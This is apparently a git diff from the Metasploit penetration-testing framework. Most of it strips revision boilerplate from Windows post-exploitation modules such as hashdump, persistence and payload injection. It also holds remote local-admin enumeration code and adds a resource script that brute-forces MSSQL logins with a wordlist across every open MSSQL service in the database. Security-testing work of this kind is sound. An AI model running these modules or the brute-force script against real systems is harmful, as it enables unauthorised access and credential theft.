memory for groups for user #{user}") + vprint_error(e.to_s) + return grouplist + end + + begin + # For each entry returned, get group + count.to_i.times{|i| + temp = {} + groupptr = mem[(base + 0),4].unpack("V*")[0] + temp[:group] = client.railgun.memread(groupptr,255).split("\0\0")[0].split("\0").join + + # Add group to string to be returned + grouplist << "#{temp[:group]}, " + if (i % 5) == 2 + grouplist <<"\n\t- " + end + base = base + 4 + } + + rescue ::Exception => e + print_error("Issue enumerating groups for user #{user}, check domain") + vprint_error(e.backtrace) + return grouplist + end + + return grouplist.chomp("\n\t- ") + + end + + # http://msdn.microsoft.com/en-us/library/windows/desktop/ms684323(v=vs.85).aspx + # method to connect to remote host using windows api + def connect(host) + if @adv.nil? + return + end + + user = client.sys.config.getuid + # use railgun and OpenSCManagerA api to connect to remote host + manag = @adv.OpenSCManagerA("\\\\#{host}", nil, 0xF003F) # SC_MANAGER_ALL_ACCESS + + if(manag["return"] != 0) # we have admin rights + result = "#{host.ljust(16)} #{user} - Local admin found\n" + # Run enumerate users on all hosts if option was set + + if datastore['ENUM_USERS'] + enum_users(host).each {|i| + result << i + } + end + + # close the handle if connection was made + @adv.CloseServiceHandle(manag["return"]) + # Append data to loot table within database + print_good(result.chomp("\n")) unless result.nil? + db_loot(host, user, "localadmin.user") + else + # we dont have admin rights + print_error("#{host.ljust(16)} #{user} - No Local Admin rights") + end + end + + # Write to notes database + def db_note(host, data, type) + report_note( + :type => type, + :data => data, + :host => host, + :update => :unique_data + ) + end + + # Write to loot database + def db_loot(host, user, type) + p = store_loot(type, 'text/plain', host, "#{host}:#{user}", 'hosts_localadmin.txt', user) + vprint_status("User data stored in: #{p}") + end +end \ No newline at end of file diff --git a/modules/post/windows/gather/memory_grep.rb b/modules/post/windows/gather/memory_grep.rb index 4d328fc41d..845c7e6451 100644 --- a/modules/post/windows/gather/memory_grep.rb +++ b/modules/post/windows/gather/memory_grep.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['bannedit'], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter' ] )) diff --git a/modules/post/windows/gather/netlm_downgrade.rb b/modules/post/windows/gather/netlm_downgrade.rb index b0650415d1..3ee51c7c9b 100644 --- a/modules/post/windows/gather/netlm_downgrade.rb +++ b/modules/post/windows/gather/netlm_downgrade.rb @@ -49,10 +49,8 @@ class Metasploit3 < Msf::Post def smb_connect begin print_status("Establishing SMB connection to " + datastore['SMBHOST']) - res = cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}") - if res =~ /The command completed successfully/ - print_good("The SMBHOST should now have NetLM hashes") - end + cmd_exec("cmd.exe","/c net use \\\\#{datastore['SMBHOST']}") + print_good("The SMBHOST should now have NetLM hashes") rescue print_error("Issues establishing SMB connection") end diff --git a/modules/post/windows/gather/resolve_sid.rb b/modules/post/windows/gather/resolve_sid.rb index 377f28b56c..97772d2e71 100644 --- a/modules/post/windows/gather/resolve_sid.rb +++ b/modules/post/windows/gather/resolve_sid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module prints information about a given SID from the perspective of this session }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/reverse_lookup.rb b/modules/post/windows/gather/reverse_lookup.rb index 05e5d0aff7..42ab10ca20 100644 --- a/modules/post/windows/gather/reverse_lookup.rb +++ b/modules/post/windows/gather/reverse_lookup.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post to an IP. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => [ 'mubix' ] diff --git a/modules/post/windows/gather/screen_spy.rb b/modules/post/windows/gather/screen_spy.rb index c08a8351d8..7b53d9391f 100644 --- a/modules/post/windows/gather/screen_spy.rb +++ b/modules/post/windows/gather/screen_spy.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post 'kernelsmith ', # record support 'Adrian Kubok' # better record file names ], - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'] )) diff --git a/modules/post/windows/gather/smart_hashdump.rb b/modules/post/windows/gather/smart_hashdump.rb index 7c7c2d7c78..5276d988af 100644 --- a/modules/post/windows/gather/smart_hashdump.rb +++ b/modules/post/windows/gather/smart_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -37,7 +33,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/tcpnetstat.rb b/modules/post/windows/gather/tcpnetstat.rb index 1b508052c4..20b11fcee9 100644 --- a/modules/post/windows/gather/tcpnetstat.rb +++ b/modules/post/windows/gather/tcpnetstat.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This Module lists current TCP sessions}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/gather/usb_history.rb b/modules/post/windows/gather/usb_history.rb index 467380a180..a7e049260a 100644 --- a/modules/post/windows/gather/usb_history.rb +++ b/modules/post/windows/gather/usb_history.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module will enumerate USB Drive history on a target host.}, 'License' => MSF_LICENSE, 'Author' => [ 'nebulus'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/gather/wmic_command.rb b/modules/post/windows/gather/wmic_command.rb index 7bee85d1cf..1734683a22 100644 --- a/modules/post/windows/gather/wmic_command.rb +++ b/modules/post/windows/gather/wmic_command.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post specified Meterpreter session.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/add_user_domain.rb b/modules/post/windows/manage/add_user_domain.rb index bcaad6c5ce..3cf05cb50c 100644 --- a/modules/post/windows/manage/add_user_domain.rb +++ b/modules/post/windows/manage/add_user_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -32,7 +28,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => 'Joshua Abraham ', - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/autoroute.rb b/modules/post/windows/manage/autoroute.rb index 180acca838..2ecb936778 100644 --- a/modules/post/windows/manage/autoroute.rb +++ b/modules/post/windows/manage/autoroute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post compromised host when connecting to the named NETWORK and SUBMASK.}, 'License' => MSF_LICENSE, 'Author' => [ 'todb'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/manage/clone_proxy_settings.rb b/modules/post/windows/manage/clone_proxy_settings.rb index 7d52144720..3b96b4a4be 100644 --- a/modules/post/windows/manage/clone_proxy_settings.rb +++ b/modules/post/windows/manage/clone_proxy_settings.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Post def initialize super( 'Name' => 'Windows Manage Proxy Setting Cloner', - 'Version' => '$Revision$', 'Description' => %q{ This module copies the proxy settings from the current user to the targeted user SID, supports remote hosts as well if remote registry diff --git a/modules/post/windows/manage/delete_user.rb b/modules/post/windows/manage/delete_user.rb index f98caff6b5..e3095c4dac 100644 --- a/modules/post/windows/manage/delete_user.rb +++ b/modules/post/windows/manage/delete_user.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'chao-mu'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/enable_rdp.rb b/modules/post/windows/manage/enable_rdp.rb index 47e2da6796..f8883c54f9 100644 --- a/modules/post/windows/manage/enable_rdp.rb +++ b/modules/post/windows/manage/enable_rdp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,7 @@ class Metasploit3 < Msf::Post include Msf::Post::Windows::Accounts include Msf::Post::Windows::Registry - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services include Msf::Post::Windows::Priv include Msf::Post::Common include Msf::Post::File @@ -35,7 +31,6 @@ class Metasploit3 < Msf::Post Remote Desktop Users group. It can also forward the target's port 3389/tcp.}, 'License' => BSD_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/inject_ca.rb b/modules/post/windows/manage/inject_ca.rb index b783a15cbe..e145a1b2ec 100644 --- a/modules/post/windows/manage/inject_ca.rb +++ b/modules/post/windows/manage/inject_ca.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/inject_host.rb b/modules/post/windows/manage/inject_host.rb index 5798e2c22a..9ed36b35d4 100644 --- a/modules/post/windows/manage/inject_host.rb +++ b/modules/post/windows/manage/inject_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/migrate.rb b/modules/post/windows/manage/migrate.rb index 0e0d47e134..02849fcfde 100644 --- a/modules/post/windows/manage/migrate.rb +++ b/modules/post/windows/manage/migrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -22,7 +18,6 @@ class Metasploit3 < Msf::Post migrate to that newly spawned process.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/multi_meterpreter_inject.rb b/modules/post/windows/manage/multi_meterpreter_inject.rb index 439432dc47..881c791c67 100644 --- a/modules/post/windows/manage/multi_meterpreter_inject.rb +++ b/modules/post/windows/manage/multi_meterpreter_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -26,7 +22,6 @@ class Metasploit3 < Msf::Post payload in to the memory of the created module.}, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter'] )) diff --git a/modules/post/windows/manage/nbd_server.rb b/modules/post/windows/manage/nbd_server.rb index a992632d07..a41765f305 100644 --- a/modules/post/windows/manage/nbd_server.rb +++ b/modules/post/windows/manage/nbd_server.rb @@ -1,4 +1,3 @@ -# $Id$ # # Maps remote disks and logical volumes to a local Network Block Device # server. Allows for forensic tools to be executed on the remote disk @@ -17,7 +16,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{Maps remote disks and logical volumes to a local Network Block Device server. Allows for forensic tools to be executed on the remote disk directly.}, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Wesley McGrew '] diff --git a/modules/post/windows/manage/payload_inject.rb b/modules/post/windows/manage/payload_inject.rb index 8af6f41e6c..40b5e33190 100644 --- a/modules/post/windows/manage/payload_inject.rb +++ b/modules/post/windows/manage/payload_inject.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'Carlos Perez '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/persistence.rb b/modules/post/windows/manage/persistence.rb index 257b80a03e..12d2805069 100644 --- a/modules/post/windows/manage/persistence.rb +++ b/modules/post/windows/manage/persistence.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -23,7 +19,7 @@ class Metasploit3 < Msf::Post include Msf::Post::File include Msf::Post::Windows::Priv include Msf::Post::Windows::Registry - include Msf::Post::Windows::WindowsServices + include Msf::Post::Windows::Services def initialize(info={}) super( update_info( info, @@ -43,7 +39,6 @@ class Metasploit3 < Msf::Post 'Carlos Perez ', 'Merlyn drforbin Cousins ' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'Actions' => [['TEMPLATE'], ['REXE']], 'DefaultAction' => 'TEMPLATE', diff --git a/modules/post/windows/manage/powershell/exec_powershell.rb b/modules/post/windows/manage/powershell/exec_powershell.rb index 0ffd0eed80..59bc7cccff 100644 --- a/modules/post/windows/manage/powershell/exec_powershell.rb +++ b/modules/post/windows/manage/powershell/exec_powershell.rb @@ -32,7 +32,6 @@ class Metasploit3 < Msf::Post Setting VERBOSE to true will output both the script prior to execution and the results. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => [ diff --git a/modules/post/windows/manage/pxexploit.rb b/modules/post/windows/manage/pxexploit.rb index c0ce26f8f7..599e6679a8 100644 --- a/modules/post/windows/manage/pxexploit.rb +++ b/modules/post/windows/manage/pxexploit.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -19,7 +15,6 @@ class Metasploit3 < Msf::Post def initialize super( 'Name' => 'Windows Manage PXE Exploit Server', - 'Version' => '$Revision$', 'Description' => %q{ This module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that diff --git a/modules/post/windows/manage/remove_ca.rb b/modules/post/windows/manage/remove_ca.rb index 9254611c81..32d5b31c52 100644 --- a/modules/post/windows/manage/remove_ca.rb +++ b/modules/post/windows/manage/remove_ca.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Post from the victim's Trusted Root store.}, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/remove_host.rb b/modules/post/windows/manage/remove_host.rb index 2bf827ff50..bf26774efd 100644 --- a/modules/post/windows/manage/remove_host.rb +++ b/modules/post/windows/manage/remove_host.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -21,7 +17,6 @@ class Metasploit3 < Msf::Post }, 'License' => BSD_LICENSE, 'Author' => [ 'vt '], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/run_as.rb b/modules/post/windows/manage/run_as.rb index 804b953409..9a6c749155 100644 --- a/modules/post/windows/manage/run_as.rb +++ b/modules/post/windows/manage/run_as.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post password and then execute the command. }, 'License' => MSF_LICENSE, - 'Version' => '$Revision$', 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499'] diff --git a/modules/post/windows/manage/smart_migrate.rb b/modules/post/windows/manage/smart_migrate.rb index 4d1be6749d..b40bd5d425 100644 --- a/modules/post/windows/manage/smart_migrate.rb +++ b/modules/post/windows/manage/smart_migrate.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # ## This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -24,7 +20,6 @@ class Metasploit3 < Msf::Post and try any other explorer.exe processes it finds}, 'License' => MSF_LICENSE, 'Author' => [ 'thelightcosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/manage/vss_create.rb b/modules/post/windows/manage/vss_create.rb index ac97d9827a..12d3f7adf4 100644 --- a/modules/post/windows/manage/vss_create.rb +++ b/modules/post/windows/manage/vss_create.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_list.rb b/modules/post/windows/manage/vss_list.rb index 1580725ecd..78bdc6650e 100644 --- a/modules/post/windows/manage/vss_list.rb +++ b/modules/post/windows/manage/vss_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_mount.rb b/modules/post/windows/manage/vss_mount.rb index 05042c5552..793bd48d4d 100644 --- a/modules/post/windows/manage/vss_mount.rb +++ b/modules/post/windows/manage/vss_mount.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_set_storage.rb b/modules/post/windows/manage/vss_set_storage.rb index 949a9cea30..05543bbecf 100644 --- a/modules/post/windows/manage/vss_set_storage.rb +++ b/modules/post/windows/manage/vss_set_storage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/manage/vss_storage.rb b/modules/post/windows/manage/vss_storage.rb index 60f5438094..7f1bd47319 100644 --- a/modules/post/windows/manage/vss_storage.rb +++ b/modules/post/windows/manage/vss_storage.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/post/windows/recon/computer_browser_discovery.rb b/modules/post/windows/recon/computer_browser_discovery.rb index b7452a125f..f1975089d2 100644 --- a/modules/post/windows/recon/computer_browser_discovery.rb +++ b/modules/post/windows/recon/computer_browser_discovery.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to @@ -29,7 +25,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/recon/resolve_ip.rb b/modules/post/windows/recon/resolve_ip.rb index af675e172d..f4e761de39 100644 --- a/modules/post/windows/recon/resolve_ip.rb +++ b/modules/post/windows/recon/resolve_ip.rb @@ -20,7 +20,6 @@ class Metasploit3 < Msf::Post 'Description' => %q{ This module reverse resolves a range or IP to a hostname}, 'License' => MSF_LICENSE, 'Author' => [ 'mubix' ], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_bss_list.rb b/modules/post/windows/wlan/wlan_bss_list.rb index 7fe29ad0e5..5cb83e4b24 100644 --- a/modules/post/windows/wlan/wlan_bss_list.rb +++ b/modules/post/windows/wlan/wlan_bss_list.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_current_connection.rb b/modules/post/windows/wlan/wlan_current_connection.rb index 48dd58162c..870104b64f 100644 --- a/modules/post/windows/wlan/wlan_current_connection.rb +++ b/modules/post/windows/wlan/wlan_current_connection.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_disconnect.rb b/modules/post/windows/wlan/wlan_disconnect.rb index f5793911ed..7037787c18 100644 --- a/modules/post/windows/wlan/wlan_disconnect.rb +++ b/modules/post/windows/wlan/wlan_disconnect.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -25,7 +21,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/modules/post/windows/wlan/wlan_profile.rb b/modules/post/windows/wlan/wlan_profile.rb index 0fcd514ce9..8ec2c9ff44 100644 --- a/modules/post/windows/wlan/wlan_profile.rb +++ b/modules/post/windows/wlan/wlan_profile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -27,7 +23,6 @@ class Metasploit3 < Msf::Post }, 'License' => MSF_LICENSE, 'Author' => ['theLightCosine'], - 'Version' => '$Revision$', 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ] )) diff --git a/msfgui b/msfgui index 05b6d5e510..127ef8f7f1 100755 --- a/msfgui +++ b/msfgui @@ -8,17 +8,21 @@ # $Revision$ # +msfbase = __FILE__ +while File.symlink?(msfbase) + msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) +end + +$:.unshift(File.expand_path(File.join(File.dirname(msfbase), 'lib'))) +require 'fastlib' +require 'msfenv' + begin require 'msgpack' rescue LoadError raise LoadError, "Missing msgpack gem, try 'gem install msgpack' to use MSFGui" end -msfbase = __FILE__ -while File.symlink?(msfbase) - msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) -end - if RUBY_PLATFORM =~ /mswin|mingw/i exec "javaw -jar #{File.dirname(msfbase)}/data/gui/msfgui.jar" else diff --git a/scripts/resource/mssql_brute.rc b/scripts/resource/mssql_brute.rc new file mode 100644 index 0000000000..dc71de41dd --- /dev/null +++ b/scripts/resource/mssql_brute.rc @@ -0,0 +1,38 @@ + + +# +# Reference: +# http://carnal0wnage.attackresearch.com/2013/01/mssql-brute-forcing-with-resource.html +# + +hosts = [] + +begin + framework.db.services.each do |service| + if ( service.name =~ /mssql/i and service.state == 'open' and service.proto == 'tcp') + hosts << {'ip' => service.host.address, 'port' => service.port} + end + end +rescue ActiveRecord::ConnectionNotEstablished +puts "DB not connected..." +# Uncomment if you want auto-reconnect and retry (on really large scans the db connector can time out) +# self.run_single('db_connect ') +# puts "trying again..." +# retry +end + +self.run_single("use auxiliary/scanner/mssql/mssql_login") +self.run_single('set PASS_FILE /opt/framework/data/wordlists/mssql.txt') +#self.run_single('set STOP_ON_SUCCESS TRUE') +hosts.each do |rhost| + + self.run_single("set RHOSTS #{rhost['ip']}") + self.run_single("set RPORT #{rhost['port']}") + self.run_single('set BRUTEFORCE_SPEED 5') + self.run_single('set BLANK_PASSWORDS false') + self.run_single('set USER_AS_PASS false') + self.run_single('run') + sleep 1 +end + + diff --git a/spec/lib/rex/post/meterpreter/packet_parser_spec.rb b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb new file mode 100644 index 0000000000..61248dcd28 --- /dev/null +++ b/spec/lib/rex/post/meterpreter/packet_parser_spec.rb @@ -0,0 +1,59 @@ +require 'rex/post/meterpreter/packet' +require 'rex/post/meterpreter/packet_parser' + + +describe Rex::Post::Meterpreter::PacketParser do + subject{ + Rex::Post::Meterpreter::PacketParser.new + } + before(:each) do + @req_packt = Rex::Post::Meterpreter::Packet.new( + Rex::Post::Meterpreter::PACKET_TYPE_REQUEST, + "test_method") + @raw = @req_packt.to_r + @sock = double('Socket') + @sock.stub(:read) do |arg| + @raw.slice!(0,arg) + end + end + + it "should respond to cipher" do + subject.should respond_to :cipher + end + + it "should respond to raw" do + subject.should respond_to :raw + end + + it "should respond to reset" do + subject.should respond_to :reset + end + + it "should respond to recv" do + subject.should respond_to :recv + end + + it "should respond to hdr_length_left" do + subject.should respond_to :hdr_length_left + end + + it "should respond to payload_length_left" do + subject.should respond_to :payload_length_left + end + + it "should initialise with expected defaults" do + subject.send(:raw).should == "" + subject.send(:hdr_length_left).should == 8 + subject.send(:payload_length_left).should == 0 + end + + it "should parse valid raw data into a packet object" do + while @raw.length >0 + parsed_packet = subject.recv(@sock) + end + parsed_packet.class.should == Rex::Post::Meterpreter::Packet + parsed_packet.type.should == Rex::Post::Meterpreter::PACKET_TYPE_REQUEST + parsed_packet.method?("test_method").should == true + end + +end diff --git a/test/modules/post/test/services.rb b/test/modules/post/test/services.rb index bee5a2e639..de0fc83744 100644 --- a/test/modules/post/test/services.rb +++ b/test/modules/post/test/services.rb @@ -1,114 +1,183 @@ -# -# by kernelsmith (kernelsmith+\x40+kernelsmith+\.com) -# - -require 'msf/core' -require 'rex' -require 'msf/core/post/windows/services' - -class Metasploit3 < Msf::Post - - include Msf::Post::Windows::WindowsServices - - def initialize(info={}) - super( update_info( info, - 'Name' => 'services_post_testing', - 'Description' => %q{ This module will test windows services methods within a shell}, - 'License' => MSF_LICENSE, - 'Author' => [ 'kernelsmith'], - 'Version' => '$Revision: 11663 $', - 'Platform' => [ 'windows' ], - 'SessionTypes' => [ 'shell' ] - )) - register_options( - [ - OptBool.new("VERBOSE" , [true, "Verbose test, shows service status after each test", false]), - OptString.new("QSERVICE" , [true, "Service (keyname) to query", "winmgmt"]), - OptString.new("NSERVICE" , [true, "New Service (keyname) to create/del", "testes"]), - OptString.new("SSERVICE" , [true, "Service (keyname) to start/stop", "W32Time"]), - OptString.new("MODE" , [true, "Mode to use for startup/create tests", "demand"]), - OptString.new("DNAME" , [true, "Display name used for create test", "Cool display name"]), - OptString.new("BINPATH" , [true, "Binary path for create test", "C:\\WINDOWS\\system32\\svchost.exe -k netsvcs"]), - ], self.class) - - end - - def run - - blab = datastore['VERBOSE'] - print_status("Running against session #{datastore["SESSION"]}") - print_status("Session type is #{session.type}") - print_status("Verbosity is set to #{blab.to_s}") - print_status("Don't be surprised to see some errors as the script is faster") - print_line("than the windows SCM, just make sure the errors are sane. You can") - print_line("set VERBOSE to true to see more details") - - print_status() - print_status("TESTING service_list") - results = service_list - print_status("RESULTS: #{results.class} #{results.pretty_inspect}") - - print_status() - 